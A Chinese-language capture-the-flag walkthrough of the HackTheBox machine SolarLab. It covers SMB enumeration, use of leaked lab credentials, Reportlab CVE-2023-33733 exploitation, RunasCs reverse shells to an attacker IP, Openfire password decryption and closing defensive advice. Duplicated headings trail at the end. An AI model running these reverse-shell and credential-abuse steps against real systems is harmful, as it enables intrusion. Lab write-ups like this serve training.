SolarLab HTB 渗透测试完整教学文档<\/h1>

1. 初始信息收集<\/h2>

1.1 端口扫描<\/h3>

使用Nmap进行初始扫描：<\/p>

nmap -A -Pn -sV 10.10.11.16 -oN SolarLab.tcp
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

80\/tcp: HTTP (nginx 1.24.0)<\/li>
135\/tcp: MSRPC (Microsoft Windows RPC)<\/li>
139\/tcp: NETBIOS-SSN<\/li>
445\/tcp: Microsoft-DS (Samba)<\/li>
<\/ul>
1.2 SMB枚举<\/h3>
使用smbmap检查共享权限：<\/p>
smbmap -H 10.10.11.16 -u " "<\/span>
<\/span><\/span><\/code><\/pre>发现"Documents"共享有读取权限，下载所有可访问文件：<\/p>
smbclient \/\/10.10.11.16\/Documents\/
<\/span><\/span>> prompt OFF
<\/span><\/span>> recurse ON
<\/span><\/span>> mget *
<\/span><\/span><\/code><\/pre>下载的文件：<\/p>

desktop.ini<\/li>
details-file.xlsx<\/li>
old_leave_request_form.docx<\/li>
concepts\/Training-Request-Form.docx<\/li>
concepts\/Travel-Request-Sample.docx<\/li>
<\/ul>
2. 凭证收集与分析<\/h2>
2.1 从Excel文件中提取凭证<\/h3>
details-file.xlsx中包含以下凭证信息：<\/p>
用户名：<\/p>
Alexander.knight@gmail.com
KAlexander
Alexander.knight@gmail.com
blake.byte
AlexanderK
ClaudiaS
<\/code><\/pre>
密码：<\/p>
al;ksdhfewoiuhdkjafblkjadsfgld398sadsknr390
ThisCanB3typedeasily1@
danenacia9234ndadsfawe9dafkn
<\/code><\/pre>
2.2 密码喷洒攻击<\/h3>
尝试使用收集到的凭证进行密码喷洒，但初始尝试未成功。<\/p>
3. 全端口扫描<\/h2>
发现遗漏的6791端口：<\/p>
nmap -p- -Pn 10.10.11.16
<\/span><\/span>nmap -p6791 -A -sV 10.10.11.16
<\/span><\/span><\/code><\/pre>6791端口运行nginx 1.24.0，重定向到：<\/p>
http:\/\/report.solarlab.htb:6791\/
<\/code><\/pre>
4. 登录PDF生成站点<\/h2>
发现用户名格式为"名字+姓氏首字母"：<\/p>

AlexanderK<\/li>
ClaudiaS<\/li>
推测可能存在BlakeB<\/li>
<\/ul>
尝试组合：<\/p>
用户名: BlakeB
密码: ThisCanB3typedeasily1@
<\/code><\/pre>
登录成功，进入PDF生成站点。<\/p>
5. 漏洞利用<\/h2>
5.1 识别漏洞<\/h3>
PDF生成器可能使用Reportlab，存在CVE-2023-33733：<\/p>

Reportlab ≤ v3.6.12允许通过特制PDF文件执行任意代码<\/li>
<\/ul>
利用代码：<\/p>
https:\/\/github.com\/c53elyas\/CVE-2023-33733
<\/code><\/pre>
5.2 获取初始访问<\/h3>
成功利用漏洞获取初始访问权限。<\/p>
6. 横向移动<\/h2>
6.1 收集更多凭证<\/h3>
从系统中收集到更多凭证：<\/p>
blakeb: ThisCanB3typedeasily1@
claudias: 007poiuytrewq
alexanderk: HotP!fireguard
<\/code><\/pre>
6.2 枚举本地用户<\/h3>
使用Sharpshooter枚举本地用户：<\/p>
Get-LocalUser
<\/code><\/pre>
发现用户：<\/p>

Administrator<\/li>
blake<\/li>
DefaultAccount<\/li>
Guest<\/li>
openfire<\/li>
WDAGUtilityAccount<\/li>
<\/ul>
6.3 横向到openfire用户<\/h3>
使用crackmapexec验证凭证：<\/p>
crackmapexec smb solarlab.htb -u users.txt -p pass.txt --continue-on-success -x whoami
<\/span><\/span><\/code><\/pre>发现openfire用户凭证有效：<\/p>
solarlab\openfire:HotP!fireguard
<\/code><\/pre>
6.4 获取openfire访问<\/h3>
使用RunasCs执行powershell：<\/p>
.\RunasCs.exe openfire HotP!fireguard powershell -r 10.10.14.18:8888
<\/code><\/pre>
7. 权限提升<\/h2>
7.1 发现Openfire管理员凭证<\/h3>
在openfire程序目录中发现：<\/p>
embedded-db\/openfire.script
<\/code><\/pre>
包含管理员凭证哈希：<\/p>
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','admin@solarlab.htb','001700223740785','0')
<\/code><\/pre>
加密密钥：<\/p>
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)
<\/code><\/pre>
7.2 解密密码<\/h3>
使用openfire_decrypt工具解密：<\/p>
java OpenFireDecryptPass.java becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442 hGXiFzsKaAeYLjn
<\/span><\/span><\/code><\/pre>获得管理员密码：<\/p>
ThisPasswordShouldDo!@
<\/code><\/pre>
7.3 获取管理员权限<\/h3>
使用RunasCs获取管理员shell：<\/p>
.\RunasCs.exe Administrator ThisPasswordShouldDo!@ powershell -r 10.10.14.18:9999
<\/code><\/pre>
8. 关键工具与技术总结<\/h2>


信息收集工具<\/strong>：<\/p>

Nmap (端口扫描)<\/li>
smbmap\/smbclient (SMB枚举)<\/li>
<\/ul>
<\/li>

凭证收集与分析<\/strong>：<\/p>

文件分析 (Excel, Word文档)<\/li>
密码喷洒攻击<\/li>
<\/ul>
<\/li>

漏洞利用<\/strong>：<\/p>

CVE-2023-33733 (Reportlab RCE)<\/li>
GitHub利用代码<\/li>
<\/ul>
<\/li>

横向移动工具<\/strong>：<\/p>

crackmapexec (凭证验证)<\/li>
RunasCs (权限提升)<\/li>
<\/ul>
<\/li>

密码解密<\/strong>：<\/p>

openfire_decrypt (Openfire密码解密)<\/li>
<\/ul>
<\/li>

权限提升技术<\/strong>：<\/p>

服务配置文件中寻找凭证<\/li>
密码重用攻击<\/li>
<\/ul>
<\/li>
<\/ol>
9. 防御建议<\/h2>


密码策略<\/strong>：<\/p>

避免密码重用<\/li>
实施强密码策略<\/li>
定期轮换凭证<\/li>
<\/ul>
<\/li>

服务安全<\/strong>：<\/p>

及时更新软件(如Reportlab)<\/li>
限制SMB共享权限<\/li>
保护配置文件中的敏感信息<\/li>
<\/ul>
<\/li>

网络架构<\/strong>：<\/p>

网络分段<\/li>
最小权限原则<\/li>
监控异常登录行为<\/li>
<\/ul>
<\/li>

应用安全<\/strong>：<\/p>

输入验证<\/li>
安全文件处理<\/li>
禁用不必要的服务<\/li>
<\/ul>
<\/li>
<\/ol>

SolarLab HTB 渗透测试完整教学文档<\/h1>

1. 初始信息收集<\/h2>

2. 凭证收集与分析<\/h2>

2.2 密码喷洒攻击<\/h3> 尝试使用收集到的凭证进行密码喷洒，但初始尝试未成功。<\/p>

5. 漏洞利用<\/h2>

5.2 获取初始访问<\/h3> 成功利用漏洞获取初始访问权限。<\/p>

6. 横向移动<\/h2>

7. 权限提升<\/h2>

2.2 密码喷洒攻击<\/h3>
尝试使用收集到的凭证进行密码喷洒，但初始尝试未成功。<\/p>

5.2 获取初始访问<\/h3>
成功利用漏洞获取初始访问权限。<\/p>